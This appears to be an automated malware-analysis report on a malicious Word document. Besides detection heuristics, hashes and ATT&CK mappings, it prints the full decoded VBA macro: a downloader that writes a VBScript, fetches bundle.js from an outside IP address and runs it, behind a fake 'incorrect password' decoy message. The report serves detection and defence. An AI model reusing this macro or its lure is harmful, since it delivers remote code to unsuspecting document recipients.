Office (OOXML) malware analysis — malicious · b3c1ae42c6cd4bb3

MALICIOUS

Office (OOXML)

19.7 KB Created: 2021-04-25 18:51:00 UTC Authoring application: Microsoft Office Word 16.0000 First seen: 2021-06-17

MD5: 548dc10231f3362a3be0d86f313cd656 SHA-1: 563fa5895b7b91ff9f54533a9a77be4006ad6111 SHA-256: b3c1ae42c6cd4bb35c29634bc97d8caa7e5891dc7b494fadf33fa5e853623e8e

250 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1059.007 JavaScript T1105 Ingress Tool Transfer

The sample contains VBA macros that utilize WScript.Shell and CreateObject to download a JavaScript file from 'http://192.168.50.100/bundle.js' and save it as 'C:\Users\Public\test.vbs'. The script then proceeds to execute this downloaded JavaScript, indicating a multi-stage attack where the initial document serves as a downloader for a secondary payload.

Heuristics 7

VBA project inside OOXML medium 5 related findings OOXML_VBA

Document contains a VBA project — VBA macros present
Potential Shell call in VBA critical OLE_VBA_SHELL

Potential Shell call in VBA
Matched line in script
```
  Shell "wscript C:\Users\Public\test.vbs"
End Sub
```

WScript.Shell usage critical OLE_VBA_WSCRIPT

WScript.Shell usage

Matched line in script

        Print #FileFunct, "objFile.Close( )"
        Print #FileFunct, "Set WshShell = WScript.CreateObject(""WScript.Shell"")"
        Print #FileFunct, "WshShell.Run ""C:\Users\Public\bundle.js"" "

Obfuscated VBA Shell command with URL critical OLE_VBA_OBFUSCATED_SHELL_URL

VBA macro invokes Shell with command text assembled through decoder or string-manipulation functions and includes a URL. This is a high-confidence downloader/dropper pattern, stronger than Shell or URL evidence on their own.
Matched line in script
```
        Print #FileFunct, "objFile.Close( )"
        Print #FileFunct, "Set WshShell = WScript.CreateObject(""WScript.Shell"")"
        Print #FileFunct, "WshShell.Run ""C:\Users\Public\bundle.js"" "
```

CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call

Matched line in script

        Print #FileFunct, "Const ForReading = 1, ForWriting = 2, ForAppending = 8"
        Print #FileFunct, "Set objFSO = CreateObject( ""Scripting.FileSystemObject"" )"
        Print #FileFunct, "If objFSO.FolderExists( myPath ) Then"

Environ() call (env variable access) low OLE_VBA_ENVIRON

Environ() call (env variable access)

Matched line in script

    Close FileFunct
    MsgBox "Incorrect password. IT security will be notified following further violations by" & (Environ("COMPUTERNAME"))

Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://192.168.50.100/bundle.js Referenced by macro
- http://schemas.microsoft.com/office/word/2010/wordprocessingCanvasReferenced by macro
- http://schemas.microsoft.com/office/drawing/2014/chartexReferenced by macro
- http://schemas.microsoft.com/office/drawing/2015/9/8/chartexReferenced by macro
- http://schemas.microsoft.com/office/drawing/2015/10/21/chartexReferenced by macro
- http://schemas.microsoft.com/office/drawing/2016/5/9/chartexReferenced by macro
- http://schemas.microsoft.com/office/drawing/2016/5/10/chartexReferenced by macro
- http://schemas.microsoft.com/office/drawing/2016/5/11/chartexReferenced by macro
- http://schemas.microsoft.com/office/drawing/2016/5/12/chartexReferenced by macro
- http://schemas.microsoft.com/office/drawing/2016/5/13/chartexReferenced by macro
- http://schemas.microsoft.com/office/drawing/2016/5/14/chartexReferenced by macro
- http://schemas.openxmlformats.org/markup-compatibility/2006Referenced by macro
- http://schemas.microsoft.com/office/drawing/2016/inkReferenced by macro
- http://schemas.microsoft.com/office/drawing/2017/model3dReferenced by macro
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsReferenced by macro
- http://schemas.openxmlformats.org/officeDocument/2006/mathReferenced by macro
- http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingReferenced by macro
- http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingReferenced by macro
- http://schemas.openxmlformats.org/wordprocessingml/2006/mainReferenced by macro
- http://schemas.microsoft.com/office/word/2010/wordmlReferenced by macro
- http://schemas.microsoft.com/office/word/2012/wordmlReferenced by macro
- http://schemas.microsoft.com/office/word/2018/wordml/cexReferenced by macro
- http://schemas.microsoft.com/office/word/2016/wordml/cidReferenced by macro
- http://schemas.microsoft.com/office/word/2018/wordmlReferenced by macro
- http://schemas.microsoft.com/office/word/2015/wordml/symexReferenced by macro
- http://schemas.microsoft.com/office/word/2010/wordprocessingGroupReferenced by macro
- http://schemas.microsoft.com/office/word/2010/wordprocessingInkReferenced by macro
- http://schemas.microsoft.com/office/word/2006/wordmlReferenced by macro
- http://schemas.microsoft.com/office/word/2010/wordprocessingShapeReferenced by macro

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source from OOXML)	2441 bytes
SHA-256: `c2f4749c0a38d4412a9eeebc37de03f5cccc299986a8afe0978722d3b3636a7e`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Sub NewFile() Dim YourPath As String Dim FileFunct As Integer YourPath = "C:\Users\Public\test.vbs" FileFunct = FreeFile Open YourPath For Output As FileFunct Print #FileFunct, "HTTPDownload ""http://192.168.50.100/bundle.js"", ""C:\Users\Public"" " Print #FileFunct, "Sub HTTPDownload( myURL, myPath )" Print #FileFunct, "Dim i, objFile, objFSO, objHTTP, strFile, strMsg" Print #FileFunct, "Const ForReading = 1, ForWriting = 2, ForAppending = 8" Print #FileFunct, "Set objFSO = CreateObject( ""Scripting.FileSystemObject"" )" Print #FileFunct, "If objFSO.FolderExists( myPath ) Then" Print #FileFunct, "strFile = objFSO.BuildPath( myPath, Mid( myURL, InStrRev(myURL, ""/"" ) + 1 ) )" Print #FileFunct, "ElseIf objFSO.FolderExists( Left( myPath, InStrRev( myPath,""\"" ) - 1 ) ) Then" Print #FileFunct, "strFile = myPath" Print #FileFunct, "End If" Print #FileFunct, "Set objFile = objFSO.OpenTextFile( strFile, ForWriting, True)" Print #FileFunct, "Set objHTTP = CreateObject( ""WinHttp.WinHttpRequest.5.1"" )" Print #FileFunct, "objHTTP.Open ""GET"", myURL, False" Print #FileFunct, "objHTTP.Send" Print #FileFunct, "For i = 1 To LenB( objHTTP.ResponseBody )" Print #FileFunct, "objFile.Write Chr( AscB( MidB( objHTTP.ResponseBody, i, 1) ) )" Print #FileFunct, "Next" Print #FileFunct, "objFile.Close( )" Print #FileFunct, "Set WshShell = WScript.CreateObject(""WScript.Shell"")" Print #FileFunct, "WshShell.Run ""C:\Users\Public\bundle.js"" " Print #FileFunct, " End Sub" Print #FileFunct, Print #FileFunct, Print #FileFunct, Print #FileFunct, Print #FileFunct, Print #FileFunct, Print #FileFunct, Print #FileFunct, Print #FileFunct, Close FileFunct MsgBox "Incorrect password. IT security will be notified following further violations by" & (Environ("COMPUTERNAME")) Shell "wscript C:\Users\Public\test.vbs" End Sub
`vbaProject_00.bin`	vba-project	OOXML VBA project: word/vbaProject.bin	21504 bytes
SHA-256: `20e73240dbe07060d57e4bb482e2f7ec2740c22480370f0c05be4d3bb7e60fb3`

Open this report in the interactive analyzer, or submit your own file for analysis.